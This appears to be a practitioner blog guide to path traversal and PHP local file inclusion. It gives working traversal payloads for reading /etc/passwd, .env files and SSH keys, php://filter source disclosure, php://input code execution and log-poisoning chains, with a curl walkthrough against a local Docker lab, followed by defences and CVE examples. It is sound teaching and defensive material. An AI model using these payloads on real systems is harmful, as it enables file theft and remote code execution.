Path Traversal and LFI: 2026 Practitioner Guide

Path traversal is the second-oldest serious web vulnerability after SQL injection, catalogued as CWE-22 and parked inside the A01 Broken Access Control bucket of the OWASP Top 10. The basic shape, sticking ../ into a ?file= parameter to read /etc/passwd, looks dated enough that every junior pentester learns it on day one and assumes the class is solved. It is not. In PHP land, traversal is the front door to a chain that reads source, then writes source, then runs code, all from a single GET parameter and a forgiving php.ini.

I find path traversal in more engagements than I would expect to in 2026. Every time I think the class is solved, the next code review turns up another include($_GET['page']) sitting in a corner of the codebase where a junior was told to be careful.

This article is the deep dive companion to the web application security vulnerabilities taxonomy and a sibling to the SQL injection spoke. I cover the mechanism, the four exploit shapes that actually matter in 2026, a fully-working walkthrough against a Dockerised lab, the variants in non-PHP stacks, and the defences that hold up. Tool-level material lives in best LFI tools 2026.

What is path traversal?

Path traversal is a vulnerability in which user-supplied input is concatenated into a filesystem path that the application then opens, allowing the user to step outside the intended directory using relative-path segments like ../ and read files the developer never meant to expose. The most common payload, ../../../../etc/passwd, escapes a docroot or templates directory and lands on the Unix password file.

Three terms get used interchangeably and they are not the same:

Path traversal (CWE-22). The generic class. Any time user input controls a filesystem path and ../ can escape the intended root.
Local File Inclusion (LFI). A PHP-flavoured subclass where the path is passed to include, require, include_once, or require_once. The file is not just read, it is interpreted as PHP. If the attacker can get PHP source onto the box (log poisoning, upload, wrapper), LFI turns into code execution.
Remote File Inclusion (RFI). The same sink, but the include path is a URL. Effectively extinct in modern PHP because allow_url_include defaults to Off, but it lives on in legacy configs and in CTF challenges.

OWASP places traversal under A01 Broken Access Control rather than as its own item, which understates how often I find it during code review. Verify against the OWASP Top 10 2021 listing yourself; the 2024 refresh is still in draft at the time of writing.

The canonical vulnerable PHP, two lines:

php

$page = $_GET['page'];
include($page);

Hit it with ?page=pages/about.php and the application works as intended. Hit it with ?page=../../../../etc/passwd and the application reads /etc/passwd. There is no third interpretation; the parser is doing exactly what was written.

The four exploit shapes

Every traversal exploit I have shipped against a real engagement falls into one of four shapes. Three of them are PHP-specific and chain to RCE. The fourth is the cross-stack baseline.

Classic `../` traversal

The original shape. The application reads the file and serves the bytes. Useful for reading config, credentials, source (if the file is served raw rather than interpreted), application metadata, SSH keys if you are lucky and the web user has access.

code

GET /download?file=../../../../etc/passwd
GET /view?template=../../../../var/www/app/.env
GET /image?path=../../../../home/deploy/.ssh/id_rsa

The number of ../ segments is "as many as needed". A request that goes too high just lands at / and the filesystem ignores the surplus, so ../../../../../../../../etc/passwd works as well as the exact count. Lazy traversal payloads always over-shoot for that reason.

`php://filter` source disclosure

PHP ships a set of stream wrappers for include and the filesystem functions, and the php://filter wrapper accepts a chain of filters applied to the underlying file before it is read. The interesting filter is convert.base64-encode:

code

GET /view.php?page=php://filter/convert.base64-encode/resource=index

include() is handed a stream that base64-encodes the file index.php as it reads. Because the bytes coming out are no longer valid PHP source, the engine cannot parse them as code; it falls back to echoing them as if they were plain text, and the response contains a base64 blob. Decode it locally and you have the verbatim source. Repeat against every script you can guess (view, login, db, config, wp-config) and you walk away with the application source plus every credential hard-coded in it.

This shape works against sinks that the classic shape cannot defeat. The most common one is include($_GET['page'] . '.php'), where the appended .php blocks a literal /etc/passwd read but is happily consumed by the wrapper as part of the resource= argument.

`php://input` RCE

The php://input wrapper exposes the raw request body as a stream. include('php://input') reads the POST body and parses it as PHP. With allow_url_include=On enabled in php.ini, an unauthenticated attacker gets code execution from one GET parameter plus one POST body.

code

POST /view-raw.php?page=php://input
Body: <?php system($_GET[0]); ?>

The default value of allow_url_include is Off, and PHP has shipped that default since 5.2 (see the PHP runtime configuration reference). Production servers that have not been hand-tampered with are safe from this specific shape by default. The shape still appears in the wild because operators flip the setting on while debugging a legitimate use case, never flip it back, and leave the server in that state for years.

Log poisoning

Log poisoning is the fallback when allow_url_include is Off, php://input does not work, and you still want RCE. The idea is to write PHP source onto disk via a path the attacker controls, then include that file with a classic traversal.

The two reliable write surfaces are the Apache or nginx access log and the error log. Both record the User-Agent header verbatim. Send a request with a PHP tag as the user agent:

code

curl -A '<?php system($_GET[0]); ?>' http://target/

The access log now contains a real <?php block. Read it back with a traversal:

code

GET /view-raw.php?page=../../../../var/log/apache2/access.log&0=id

include() reaches the PHP tag inside the log file, parses it, and runs the system($_GET[0]) call with the attacker's chosen command. Variants of the same trick work against /var/log/apache2/error.log (poisoned via a 404 request whose URL contains PHP), /proc/self/environ on older kernels, the $HOME/.ssh/authorized_keys file when the web user happens to be the SSH user, and any session file the application writes to a known directory.

Log poisoning fails by default on modern Debian and Ubuntu because Apache writes access logs as 0640 root:adm and the www-data user is not in the adm group. Every "let the deploy user tail the logs from the debug dashboard" change to that ACL re-opens the chain. I have seen this exact misconfiguration in three different production environments in 2024 alone.

Why null bytes don't work anymore

Pre-2010 LFI tutorials lean heavily on the null-byte truncation trick: append %00 to the payload to terminate the C-level string before PHP could append the .php suffix, turning include($_GET['page'] . '.php') into a working classic traversal. That trick was killed by PHP 5.3.4, released on December 9, 2010, which added null-byte rejection in the core filename APIs (further extensions to the check across exec, system, move_uploaded_file, and related functions landed across the 5.6.x series in 2015). Any path containing a \0 byte now raises an error rather than being silently truncated.

Verify against the PHP 5.3.4 changelog yourself before relying on the date in your own writing.

Everything that followed in this article exists because the wrappers became the modern equivalent of the null byte. php://filter defeats the same suffix-append sink that %00 used to defeat, and it has no equivalent fix in the language because the wrapper is a legitimate feature.

Walk a working chain (lab)

For everything below, I am attacking the lfi-basic target from the techearl-labs companion repo. It is a small PHP 8.2 app with two intentionally-vulnerable include sinks side by side, deliberately configured with allow_url_include=On and display_errors=On. Boot it with:

bash

docker compose up lfi-basic

The lab listens on http://localhost:8084. The two endpoints differ in one detail that drives every exploit decision below:

Endpoint	Sink shape
`/view.php?page=pages/about`	`include($_GET['page'] . '.php')`, `.php` is appended
`/view-raw.php?page=pages/about.php`	`include($_GET['page'])`, raw, no suffix

1. Classic traversal against the raw sink

view-raw.php passes the parameter straight through. Plain ../ works:

bash

curl 'http://localhost:8084/view-raw.php?page=../../../../etc/passwd'

The response renders /etc/passwd inline inside the page panel. Files with no <?php opening tag are echoed by include(), which is why the password file comes back as plain text rather than being parsed.

The same payload against /view.php fails. The engine looks for /etc/passwd.php, finds nothing, and the warning surfaces in the response (because display_errors=On). The suffix is doing its only useful job.

2. `php://filter` source disclosure against the suffix sink

view.php appends .php, so the wrapper has to compose with the suffix:

bash

curl 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about'

The wrapper opens pages/about.php (the appended .php rides along inside the resource= argument), pipes it through the base64 encoder, and the include echoes the encoded source. Pipe through base64 -d to recover the original:

bash

curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about' \
  | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d

Repeat for resource=view, resource=view-raw, resource=shared/layout to pull every PHP source file the application ships. Source disclosure is the highest-value LFI outcome short of code execution because it hands you every other endpoint's sink shape and every hard-coded credential in one pass.

3. `php://input` RCE against the raw sink

The wrapper only matches the literal path php://input, so the attack runs against view-raw.php (no suffix). Against view.php, the appended .php produces php://input.php, which the wrapper does not recognise.

bash

curl -X POST --data '<?php echo shell_exec("id"); ?>' \
  'http://localhost:8084/view-raw.php?page=php://input'

The response carries the output of id, something like uid=33(www-data) gid=33(www-data) .... Any PHP runs, not just shell_exec: file writes, reverse shells, persistent webshells dropped into the docroot, database egress, anything the www-data process can do inside the container.

4. Log poisoning against the raw sink

The chain has two steps. Inject a PHP tag into the access log via the User-Agent of any request:

bash

curl -A '<?php system($_GET[0]); ?>' http://localhost:8084/

Include the log via traversal, passing the command in ?0=:

bash

curl 'http://localhost:8084/view-raw.php?page=../../../../var/log/apache2/access.log&0=id'

The log contains thousands of bytes of unrelated request lines, but the moment the parser sees <?php system($_GET[0]); ?> it switches into PHP mode, runs the call, switches back to literal-output mode, and the response carries the command output along with the rest of the log.

The lab's Dockerfile deliberately adds www-data to the adm group so the 0640 root:adm access log is readable by PHP. Without that change the chain fails with permission-denied; with it, it succeeds. The misconfiguration mirrors what real "let the web app tail its own logs" deployments do.

Beyond PHP: traversal in other stacks

The PHP-specific shapes (php://filter, php://input, log-poisoning-via-include) do not port to other stacks because no other runtime evaluates included files as code. The classic traversal shape does. Every framework that constructs a path from user input is potentially vulnerable.

Node.js

The footgun is path.join and friends. path.join happily resolves .. segments and lets you escape the base directory:

javascript

app.get('/files/:name', (req, res) => {
  const file = path.join('/var/www/uploads', req.params.name);
  res.sendFile(file);
});

GET /files/..%2F..%2F..%2Fetc%2Fpasswd resolves to /etc/passwd. The fix is path.resolve plus a prefix check, not path.join:

javascript

const base = path.resolve('/var/www/uploads');
const target = path.resolve(base, req.params.name);
if (!target.startsWith(base + path.sep)) return res.sendStatus(403);
res.sendFile(target);

Express's static middleware blocks .. segments by default, but custom send handlers and any direct fs.readFile call with user input are at risk.

Java

The classic Java instance is the "zip slip" vulnerability disclosed by Snyk in 2018, where archive entries with ../ in the name escape the extraction directory:

java

File target = new File(destDir, entry.getName());
new FileOutputStream(target).write(...);

A malicious archive entry named ../../../../etc/cron.d/pwn lands wherever the running user has write access. Fix:

java

File target = new File(destDir, entry.getName()).getCanonicalFile();
if (!target.toPath().startsWith(destDir.toPath())) {
  throw new IOException("zip slip: " + entry.getName());
}

getCanonicalFile() resolves .. segments and symlinks before the prefix check; getAbsoluteFile() does not, which is why the lazy fix loses.

.NET

Path.Combine is the equivalent of Node's path.join and has the same defect, except worse: if the second argument is an absolute path, Path.Combine discards the first argument entirely and returns the second. Path.Combine("/var/www/uploads", "/etc/passwd") returns /etc/passwd. The defence is Path.GetFullPath plus a prefix check, identical in shape to the Node.js pattern. Modern guidance on Microsoft Learn pushes Path.GetFullPath with an explicit base, which validates inputs as it resolves.

The class is the same across every stack. The interpreter changes, the syntax changes, the trust failure does not.

Modern defences

Resolve and prefix-check

The single most important defence is to resolve the requested path to its canonical form and then check it is inside the allowed directory. In PHP that is realpath:

php

$base = realpath(__DIR__ . '/pages');
$target = realpath($base . '/' . $_GET['page']);
if ($target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
  http_response_code(403);
  exit('Forbidden');
}
include($target);

realpath returns false for paths that do not exist, which closes the "file does not exist yet but the parent directory check passed" race window. The str_starts_with prefix check with the trailing separator stops the /srv/pages-evil/ versus /srv/pages/ confusion, where the legitimate base is a prefix of an attacker-controlled sibling directory.

Allow-list of known IDs

Better: do not let user input become a path at all. Map an opaque ID to a known file:

php

$pages = [
  'about' => '/srv/app/pages/about.php',
  'contact' => '/srv/app/pages/contact.php',
];
$key = $_GET['page'] ?? 'about';
if (!isset($pages[$key])) { http_response_code(404); exit; }
include($pages[$key]);

This is the only design that is correct by construction. The user controls a key into a map, not a filesystem path. Adding a page is one line in the array, which is cheap enough that I reach for this pattern by default.

Disable dangerous PHP directives

ini

allow_url_include = Off
allow_url_fopen = Off
open_basedir = /srv/app:/tmp
display_errors = Off
log_errors = On

allow_url_include=Off kills the php://input RCE chain outright. allow_url_fopen=Off removes the network-fetch shapes. open_basedir confines filesystem access to an allow-listed set of directories, blocking the traversal even if the application sink is broken. None of these defences cover php://filter against the local docroot, which is why they are layered with the prefix check, not a replacement for it.

Separate file-serving service

For applications that genuinely serve user-uploaded files, the strongest pattern is a separate microservice (or a CDN with signed URLs) that holds nothing but the upload bucket and serves files by content-addressed identifier. The application hands the user a signed URL pointing at the service; the service has no relationship to the application's filesystem and no traversal sink. This is how every mature SaaS handles user uploads at scale.

Chroot and container isolation

Running the web process inside a chroot or a container with a minimal filesystem means a successful traversal lands the attacker inside a sandbox with nothing valuable in it. A read of /etc/passwd returns the container's stub /etc/passwd, not the host's. Combine with read-only root, no shell binaries, and dropped capabilities (CAP_DAC_READ_SEARCH in particular) and even a chained RCE has very little to do.

Real-world incidents (CVE section)

Path traversal hits well-maintained software regularly. A representative sample, all verified against the public CVE record:

CVE-2021-41773, Apache HTTP Server 2.4.49. Path traversal in URL handling, allowing requests to reach files outside the document root if directories were configured with Require all granted. Disclosed and patched in October 2021. The fix in 2.4.50 was incomplete, leading to CVE-2021-42013 a week later that also extended the impact to RCE when mod_cgi was enabled.
CVE-2021-42013, Apache HTTP Server 2.4.49 and 2.4.50. The follow-up to 41773, exploitable via double-encoding of the traversal sequence. The Apache foundation rated it Critical for the RCE variant.
CVE-2024-23897, Jenkins. Arbitrary file read via the built-in CLI command parser, which expanded @filename arguments. Disclosed January 2024. Without Overall/Read permission, attackers could read the first three lines of any file readable by the Jenkins controller; with Overall/Read, the full file contents. Real exploitation chained the file-read into SSH key disclosure and lateral movement.
CVE-2023-2825, GitLab CE/EE. Path traversal in the file upload handler, allowing an unauthenticated user to read arbitrary files from the GitLab server when an attachment was in a public project nested deep enough. Disclosed May 2023 (NVD published 2023-05-26), affecting GitLab CE/EE 16.0.0 only; GitLab released 16.0.1 shortly after.
CVE-2019-19781, Citrix ADC and Gateway. Path traversal in the Citrix VPN appliance reaching a Perl template that the attacker could write to, chaining traversal into unauthenticated RCE. The 2019 disclosure landed without a patch for ten days and was mass-exploited.

Every one of these landed in software with security teams, code review, and bug-bounty programs. Path traversal is not a museum piece.

By itself, no. realpath() resolves .. segments and symlinks but it does not enforce that the resolved path is inside the directory you intended. The defence is realpath() plus an explicit prefix check (str_starts_with with a trailing separator) against the resolved base directory. The prefix check is the part that actually stops the escape; realpath() is what makes the check meaningful by normalising the path first.

Because it is a legitimate stream API used by frameworks to read raw POST bodies, especially for JSON and XML payloads, where you do not want PHP's form-parser to consume the body before your application sees it. The dangerous combination is php://input used as the target of include(), which only happens when an application is already vulnerable to path traversal and the operator has flipped allow_url_include to On. The wrapper itself is not the problem; the include sink plus the unsafe directive is.

No. Encoded variants (%2e%2e%2f, %252e%252e%252f, UTF-8 overlong encodings, ....// which collapses to ../ after a single normalisation pass) defeat naive blacklists. Even a correct blacklist does not catch the php://filter shape, which never contains a ... Block-listing is the wrong shape of defence for this class. Resolve the path and check the resolved location.

It is a useful belt-and-braces directive but it has a long history of bypasses, most through PHP extensions that do not honour it (older versions of imagick, certain bundled SQLite paths, race conditions with realpath caching). Treat open_basedir as defence in depth that raises the cost of exploitation, not as a primary defence. The primary defence is still the prefix check at the sink.

Local File Inclusion includes a file already on the server's filesystem; the attack value comes from reading or executing files the developer did not intend to expose. Remote File Inclusion includes a file fetched from a URL the attacker controls, which is immediately RCE because the attacker writes the included PHP source. PHP gates RFI behind the allow_url_include directive, which has defaulted to Off since PHP 5.2. RFI is effectively dead in modern deployments; LFI is alive and well.

Marginally. It blocks the literal classic-traversal read of files without a .php extension (so ../../../etc/passwd fails) but it does not block the php://filter wrapper, which composes with the suffix as part of its resource= argument. Worse, the suffix can give a false sense of security to the operator who added it. Do the prefix-check defence properly and the suffix becomes irrelevant.

Grep for every filesystem sink that accepts a string: include, require, file_get_contents, fopen, readfile, SplFileObject in PHP; fs.readFile, fs.createReadStream, res.sendFile in Node; new File(), FileInputStream, Files.readAllBytes in Java. For each match, trace the path argument back to its source. If any path of execution lets user input reach the sink without a resolve-and-prefix-check, you have traversal.

Where to go next

The best LFI tools for 2026 listicle for the practical tool comparison.
The SQL injection deep dive for the sibling spoke in the same security cluster.
The web application security vulnerabilities taxonomy for the full map.

Path traversal is the cheapest serious vulnerability to introduce (two lines of PHP, one line of Node) and one of the cheaper ones to fix (one resolve plus one prefix check). The reason it survives is not that the fix is hard, it is that the sinks are scattered across the codebase and every "let the user pick a file" feature is a fresh chance to get it wrong. Treat every filesystem path that touches user input as untrusted, every time.

Path Traversal and Local File Inclusion (LFI): The Complete 2026 Practitioner Guide

What is path traversal?

The four exploit shapes

Classic `../` traversal

`php://filter` source disclosure

`php://input` RCE

Log poisoning

Why null bytes don't work anymore

Walk a working chain (lab)

1. Classic traversal against the raw sink

2. `php://filter` source disclosure against the suffix sink

3. `php://input` RCE against the raw sink

4. Log poisoning against the raw sink

Beyond PHP: traversal in other stacks

Node.js

Java

.NET

Modern defences

Resolve and prefix-check

Allow-list of known IDs

Disable dangerous PHP directives

Separate file-serving service

Chroot and container isolation

Real-world incidents (CVE section)

Where to go next

Sources

Ishan Karunaratne

Related posts

Application-Layer DoS: The Complete 2026 Practitioner Guide

XML External Entity (XXE): The Complete 2026 Practitioner Guide

Remote Code Execution (RCE): The Complete 2026 Practitioner Guide

Does realpath() fully prevent path traversal?

Why does PHP still ship php://input?

Can I just block ../ with a regex?

Is open_basedir secure?

What is the difference between LFI and RFI?

Does the .php suffix on the include path actually help?

How do I find path traversal in code review?

Sources

Ishan Karunaratne